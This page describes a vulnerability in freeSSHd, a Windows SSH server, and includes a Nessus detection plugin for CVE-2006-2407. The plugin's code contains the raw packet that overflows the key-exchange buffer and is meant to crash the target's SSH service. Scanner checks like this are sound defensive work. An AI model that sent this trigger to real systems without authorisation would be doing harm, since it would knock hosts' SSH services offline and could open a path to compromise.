
freeSSHd Key Exchange Algorithm String Remote Overflow


7.5 High

CVSS2

Access Vector

Access Complexity

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:N/AC:L/Au:N/C:P/I:P/A:P

0.595 Medium

EPSS

Percentile

97.8%

The remote host is using freeSSHd, a free SSH server for Windows.

The version of freeSSHd installed on the remote host does not validate the length of the key exchange algorithm strings sent by an SSH client. A buffer overflow can result, possibly leading to a compromise of the host, if an unauthenticated attacker sends an overly long key exchange string.

#
# Script Written By Ferdy Riphagen
# <f[dot]riphagen[at]nsec[dot]nl>
#
# Script distributed under the GNU GPLv2 License.
#

# Changes by Tenable:
# - Revised plugin title, moved see also to xref, family change (8/14/09)


include("compat.inc");

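if (description) {
 script_id(21580);
 script_version("1.19");
 script_cvs_date("Date: 2018/08/22 16:49:14");

 script_cve_id("CVE-2006-2407");
 script_bugtraq_id(17958);
 script_xref(name:"Secunia", value:"19846");

 script_name(english:"freeSSHd Key Exchange Algorithm String Remote Overflow");

 script_set_attribute(attribute:"synopsis", value:
"The remote SSH server is prone to a buffer overflow attack." );
 script_set_attribute(attribute:"description", value:
"The remote host is using freeSSHd, a free SSH server for Windows. 

The version of freeSSHd installed on the remote host does not validate
the key exchange strings sent by a SSH client.  This can result in a
buffer overflow and possibly a compromise of the host if an
unauthenticated attacker sends a long key exchange string." );
 script_set_attribute(attribute:"solution", value:
"Upgrade to FreeSSHd version 1.0.10 or later." );
 script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P");
 script_set_cvss_temporal_vector("CVSS2#E:F/RL:OF/RC:C");
 script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
 script_set_attribute(attribute:"exploit_available", value:"true");
 script_set_attribute(attribute:"metasploit_name", value:'FreeSSHd 1.0.9 Key Exchange Algorithm String Buffer Overflow');
 script_set_attribute(attribute:"exploit_framework_metasploit", value:"true");
 script_set_attribute(attribute:"plugin_publication_date", value: "2006/05/22");
 script_set_attribute(attribute:"vuln_publication_date", value: "2006/05/12");
 script_set_attribute(attribute:"plugin_type", value:"remote");
 script_end_attributes();

 script_summary(english:"Checks for a buffer overflow in freeSSHd");
 # ACT_DENIAL: the detection below actually sends the overflow trigger and
 # is expected to crash the target's SSH service, so the plugin must only
 # run when the scan policy allows denial-of-service checks.
 script_category(ACT_DENIAL);
 script_family(english:"Gain a shell remotely");
 script_copyright(english:"This script is Copyright (C) 2006-2018 Ferdy Riphagen");
 # find_service1.nasl populates Services/ssh so the check targets the
 # real SSH port rather than assuming 22.
 script_dependencies("find_service1.nasl");
 script_require_ports("Services/ssh", 22);
 exit(0);
}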


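include("global_settings.inc");
include("misc_func.inc");

# Destructive check: the plugin fires the overflow trigger and reports the
# flaw if the SSH service stops answering afterwards.  A server that merely
# stalls, rate-limits or drops the second connection looks identical to a
# crashed one, so the check is suppressed in the "avoid false alarms"
# paranoia setting.
if (report_paranoia < 1) exit(0, "This script is prone to false positive.");

port = get_service(svc:"ssh", default: 22, exit_on_fail: 1);

soc = open_sock_tcp(port);
if (!soc) exit(1, "Cannot connect to TCP port "+port+".");

# Fingerprint the target from its version banner.  Note that the banner
# does not reveal the freeSSHd release: the fixed 1.0.10 build announces
# itself as "SSH-2.0-WeOnlyDo 1.2.7", so the banner only selects the
# product; only the crash test below tells vulnerable from patched.
# Other servers built on the same component may also match this pattern.
banner = recv(socket:soc, length:128);
if (! egrep(pattern:"SSH.+WeOnlyDo", string:banner))
{
  close(soc);
  exit(0, "The SSH server on port "+port+" is not freeSSHD.");
}

# Trigger taken verbatim from the original proof of concept: a client
# version string followed by what appears to be an SSH_MSG_KEXINIT (0x14)
# whose first name-list is filled with ~20 KB of filler, far more than
# the server's fixed-size buffer for the kex algorithm string.
ident = "SSH-2.0-OpenSSH_4.2p1";
exp = ident + raw_string(
        0x0a, 0x00, 0x00, 0x4f, 0x04, 0x05,
        0x14, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
        0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
        0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x07, 0xde)
      + crap(length:20300);

send(socket:soc, data:exp);
recv(socket:soc, length:1024);   # drain whatever comes back; its content is irrelevant
close(soc);

# Re-probe the service.  A failed reconnect is only reported as a hit once
# service_is_dead() confirms the port is really gone; a timeout or a
# transient refusal exits without a finding.
soc = open_sock_tcp(port);
if (! soc)
{
  if (service_is_dead(port: port) <= 0)   # alive or timeout
    exit(1, "Could not reconnect to port "+port+".");
  security_hole(port);
  exit(0);
}

# The listener still accepts connections but no banner follows: treat a
# silent server as the daemon having died behind an open port.  (Renamed
# from `recv` so the reply does not shadow the recv() builtin.)
reply = recv(socket:soc, length:128);
close(soc);
if (! strlen(reply)) security_hole(port);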
